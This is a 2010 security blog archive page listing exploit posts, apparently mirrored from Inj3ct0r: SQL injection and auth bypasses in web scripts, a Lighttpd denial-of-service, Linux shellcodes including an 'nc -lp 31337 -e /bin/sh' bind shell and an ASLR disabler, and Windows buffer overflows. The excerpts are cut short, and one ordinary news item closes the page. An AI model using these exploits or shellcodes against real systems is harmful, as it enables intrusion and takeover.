Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 5th, 2010

Bs Auto_Classifieds Script (articlesdetails) Sqli Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Auto_Classifieds Script (articlesdetails) Sqli Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Bs Auto_Classifieds Script (articlesdetails) Sqli Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Bs Business_Directory Script Sql injection / Auth bypass Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Business_Directory Script Sql injection / Auth bypass Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================================
Bs Business_Directory Script Sql injection / Auth bypass Vulnerability
======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Bs General_Classifieds Script Sql injection Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs General_Classifieds Script Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Bs General_Classifieds Script Sql injection Vulnerability
=========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Bs Events_Locator Script Sql injection Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Events_Locator Script Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Bs Events_Locator Script Sql injection Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Bs Home_Classifieds Script Sql injection Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Home_Classifieds Script Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Bs Home_Classifieds Script Sql injection Vulnerability
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Bs Realtor_Web Script Sql injection Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Realtor_Web Script Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Bs Realtor_Web Script Sql injection Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Bs Recipes_Website Script Sql injection / Auth bypass Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Recipes_Website Script Sql injection / Auth bypass Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================================
Bs Recipes_Website Script Sql injection / Auth bypass Vulnerability
===================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Bs Scripts_Directory Sql injection / Auth bypass Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bs Scripts_Directory Sql injection / Auth bypass Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
Bs Scripts_Directory Sql injection / Auth bypass Vulnerability
==============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Giga Nepal CMS Multiple SQL Injection Vulnerability

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Giga Nepal CMS Multiple SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
Giga Nepal CMS Multiple SQL Injection Vulnerability
===================================================
##############################################################################
# [+]Title: [Giga Nepal CMS Multiple SQL Injection Vulnerability]
##############################################################################
# [+] About :
==============================================================================
# Author : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power [...]

Leave a Comment

Lighttpd Server 1.4.23 Remote Denial of Service

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Lighttpd Server 1.4.23 Remote Denial of Service</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Lighttpd Server 1.4.23 Remote Denial of Service
===============================================
#!/usr/bin/perl
#
# Lighttpd Server 1.4.23 Remote Denial of Service
#
#AuThoR:GlaDiaT0R
#Mail: The_gl4di4t0r[AT]hotmail.com
use IO::Socket;
print &quot;[+] Author : GlaDiaT0Rn&quot;;
print &quot;[+] Mail : the_gl4di4t0r[AT]hotmail[DOT.comn&quot;;
print &quot;[+] [...]

Leave a Comment

linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================================
linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes
======================================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

linux/x86 bind sh@64533 97 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 bind sh@64533 97 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================
linux/x86 bind sh@64533 97 bytes
================================
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 lynx polymorphic shellcode 84 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 lynx polymorphic shellcode 84 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
linux/x86 lynx polymorphic shellcode 84 bytes
=============================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 setreuid(0,0) execve(“/bin/sh”,NULL,NULL) encoded 62 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 setreuid(0,0) execve(&quot;/bin/sh&quot;,NULL,NULL) encoded 62 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================================
linux/x86 setreuid(0,0) execve(&quot;/bin/sh&quot;,NULL,NULL) XOR encoded 62 bytes
========================================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================================
linux/x86 echo 0 &gt; /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes
============================================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

linux/x86 send “visit inj3ct0r.com” to all konsole XOR encoded 99 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 send &quot;visit inj3ct0r.com&quot; to all konsole XOR encoded 99 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================================
linux/x86 send &quot;visit inj3ct0r.com&quot; to all konsole XOR encoded 99 bytes
=======================================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes
================================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

SasCam 2.7 ActiveX Head Buffer Overflow

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>SasCam 2.7 ActiveX Head Buffer Overflow</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
SasCam 2.7 ActiveX Head Buffer Overflow
=======================================
# Exploit Title: SasCam 2.7 ActiveX Head Buffer Overflow
# Author: Blake
# Software Link:
http://download.cnet.com/SasCam-Webcam-Server/3000-2348_4-10491197.html
# Version: 2.7
# Tested on: Windows XP SP3 / IE6 and 7
&lt;html&gt;
&lt;object classid=’clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3′
id=’target’&gt;&lt;/object&gt;
&lt;script language=’vbscript’&gt;
‘for debugging/custom [...]

Leave a Comment

UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)

Jul.05, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================================
UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
=================================================================
#!/usr/bin/python
#
# Exploit Title: UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
# [...]

Leave a Comment

Details emerge for Australian budget system overhaul

Jul.05, 2010 in News

The Department of Finance and Deregulation released a draft requirements paper on Friday to help the industry understand the Federal Budget process before the department goes to market for the new system.
The system’s redevelopment was flagged in the 2010/11 Federal Budget.
"The system should be designed to collect and maintain up-to-date budget estimates from across departments [...]

Leave a Comment